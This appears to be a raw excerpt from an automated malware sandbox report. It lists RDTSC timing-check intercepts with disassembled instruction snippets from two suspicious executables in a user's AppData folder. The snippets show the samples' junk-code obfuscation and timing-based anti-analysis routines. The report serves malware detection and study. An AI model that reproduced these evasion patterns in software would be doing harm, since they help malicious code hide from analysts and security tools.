Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F102FD second address: 4F10379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F589A712D8Ch 0x0000000e jmp 00007F5828704A77h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 jmp 00007F5828704A76h 0x0000001b or edx, dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 7A981660h 0x00000026 pushfd 0x00000027 jmp 00007F5828704A79h 0x0000002c sbb ecx, 29A9B366h 0x00000032 jmp 00007F5828704A71h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10379 second address: 4F10389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10389 second address: 4F103FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007F5828704A77h 0x00000013 jne 00007F589A712D40h 0x00000019 jmp 00007F5828704A76h 0x0000001e test byte ptr [esi+48h], 00000001h 0x00000022 jmp 00007F5828704A70h 0x00000027 jne 00007F589A712D29h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007F5828704A6Dh 0x00000035 pop eax 0x00000036 mov edi, 5C8CAEA4h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F007C7 second address: 4F00850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov dx, ax 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push ecx 0x00000016 movsx edx, si 0x00000019 pop eax 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007F5828CEC315h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F5828CEC30Ah 0x0000002c or cx, 2B98h 0x00000031 jmp 00007F5828CEC30Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 pop edi 0x00000039 popad 0x0000003a pushad 0x0000003b mov ax, D761h 0x0000003f push eax 0x00000040 pop edi 0x00000041 popad 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F5828CEC313h 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, cx 0x00000050 mov dh, cl 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00850 second address: 4F00856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00856 second address: 4F0085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F0085A second address: 4F0089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5828704A6Ah 0x00000010 jmp 00007F5828704A75h 0x00000015 popfd 0x00000016 mov ax, 4BF7h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5828704A6Fh 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F0089E second address: 4F008BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F008BB second address: 4F008C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 666E0E92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F008C5 second address: 4F008D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov esi, 665B47B7h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F008D6 second address: 4F00922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5828704A6Dh 0x00000015 sub ax, 9AC6h 0x0000001a jmp 00007F5828704A71h 0x0000001f popfd 0x00000020 mov si, 0377h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00922 second address: 4F009DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e pushfd 0x0000000f jmp 00007F5828CEC319h 0x00000014 sub si, 7D86h 0x00000019 jmp 00007F5828CEC311h 0x0000001e popfd 0x0000001f popad 0x00000020 test esi, esi 0x00000022 jmp 00007F5828CEC30Eh 0x00000027 je 00007F589AD01D1Ah 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F5828CEC318h 0x00000038 add esi, 2BDAB288h 0x0000003e jmp 00007F5828CEC30Bh 0x00000043 popfd 0x00000044 mov esi, 7CDD6AFFh 0x00000049 popad 0x0000004a popad 0x0000004b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jmp 00007F5828CEC317h 0x0000005a mov ah, 54h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F009DB second address: 4F00A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5828704A6Ah 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00A01 second address: 4F00A07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00B38 second address: 4F00B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00B49 second address: 4F00B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov di, ax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00B53 second address: 4F00B96 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5828704A74h 0x00000008 sbb cx, AF08h 0x0000000d jmp 00007F5828704A6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5828704A75h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00BCD second address: 4F00C33 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5828CEC30Ah 0x0000000c jmp 00007F5828CEC315h 0x00000011 popfd 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 mov si, 79B3h 0x00000019 call 00007F5828CEC318h 0x0000001e mov ah, 05h 0x00000020 pop edi 0x00000021 popad 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5828CEC319h 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00C33 second address: 4F00C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828704A6Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00C59 second address: 4F00C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F00C5F second address: 4F00C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10D9B second address: 4F10DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A01 second address: 4F10A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A05 second address: 4F10A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A0B second address: 4F10A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A11 second address: 4F10A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A15 second address: 4F10A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10A19 second address: 4F10A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5828CEC30Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push edi 0x00000012 pushfd 0x00000013 jmp 00007F5828CEC316h 0x00000018 jmp 00007F5828CEC315h 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5828CEC30Ah 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F9072C second address: 4F90744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A74h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F90744 second address: 4F90774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5828CEC30Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5828CEC310h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F90774 second address: 4F90778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F90778 second address: 4F9077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F9077E second address: 4F9078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A6Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F9078D second address: 4F90791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F90791 second address: 4F907C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5828704A6Dh 0x00000012 add ecx, 20C99846h 0x00000018 jmp 00007F5828704A71h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F907C4 second address: 4F907C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F8091B second address: 4F80930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A71h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80775 second address: 4F80785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80785 second address: 4F80794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80794 second address: 4F80798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80798 second address: 4F807AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F807AB second address: 4F807F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC30Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5828CEC315h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F5828CEC30Eh 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5828CEC30Ah 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F807F5 second address: 4F807FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F200D2 second address: 4F200D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F200D8 second address: 4F200DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F200DC second address: 4F2011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a call 00007F5828CEC314h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov dx, 2854h 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5828CEC315h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2011E second address: 4F20133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80B74 second address: 4F80B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80B7A second address: 4F80B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80B7E second address: 4F80B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80B82 second address: 4F80BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5828704A76h 0x00000010 or eax, 78FB7C08h 0x00000016 jmp 00007F5828704A6Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5828704A76h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80BCD second address: 4F80C0B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5828CEC312h 0x00000008 xor cx, 7198h 0x0000000d jmp 00007F5828CEC30Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828CEC310h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80C0B second address: 4F80C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F80CE1 second address: 4F80CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: EDF434 second address: EDF438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: EDF438 second address: EDF43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1063639 second address: 106363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 106363F second address: 1063649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1063D5F second address: 1063D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1063EDE second address: 1063F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5828CEC313h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5828CEC32Dh 0x00000011 jmp 00007F5828CEC30Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC30Eh 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 10658C1 second address: 106594E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2C6Bh] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D180Ah], ecx 0x00000016 push 1CF5C958h 0x0000001b push edi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F5828704A6Ah 0x00000024 popad 0x00000025 pop edi 0x00000026 xor dword ptr [esp], 1CF5C9D8h 0x0000002d xor edi, dword ptr [ebp+122D2C93h] 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 mov ebx, dword ptr [ebp+122D2A7Fh] 0x0000003c mov edi, dword ptr [ebp+122D2BEBh] 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2BBBh] 0x0000004b mov edi, dword ptr [ebp+122D2BEBh] 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007F5828704A68h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov edx, dword ptr [ebp+122D1BD9h] 0x00000073 call 00007F5828704A69h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ecx 0x0000007b pushad 0x0000007c popad 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 106594E second address: 1065962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F5828CEC306h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065962 second address: 1065966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065AC9 second address: 1065B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F5828CEC306h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 599FCCE4h 0x00000017 jmp 00007F5828CEC30Ah 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D2C23h] 0x00000024 sub edi, 305AD351h 0x0000002a push 00000000h 0x0000002c add dword ptr [ebp+122D1D3Dh], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F5828CEC308h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dx, cx 0x00000051 sub esi, 1320830Ch 0x00000057 push ACA5E9A0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065B3B second address: 1065B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065B52 second address: 1065BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 135A1660h 0x00000010 mov cx, si 0x00000013 lea ebx, dword ptr [ebp+1245A78Fh] 0x00000019 je 00007F5828CEC30Ch 0x0000001f sbb ecx, 2208CF27h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jc 00007F5828CEC306h 0x0000002f jmp 00007F5828CEC319h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065BA5 second address: 1065BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F5828704A66h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F5828704A6Ch 0x00000015 jnp 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065C63 second address: 1065D1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, 1527h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 mov dword ptr [ebp+122D2877h], eax 0x0000001d pop ecx 0x0000001e push 9E482409h 0x00000023 pushad 0x00000024 jmp 00007F5828CEC313h 0x00000029 pushad 0x0000002a jmp 00007F5828CEC310h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 add dword ptr [esp], 61B7DC77h 0x0000003a jp 00007F5828CEC307h 0x00000040 stc 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 sub dword ptr [ebp+122D288Bh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F5828CEC308h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 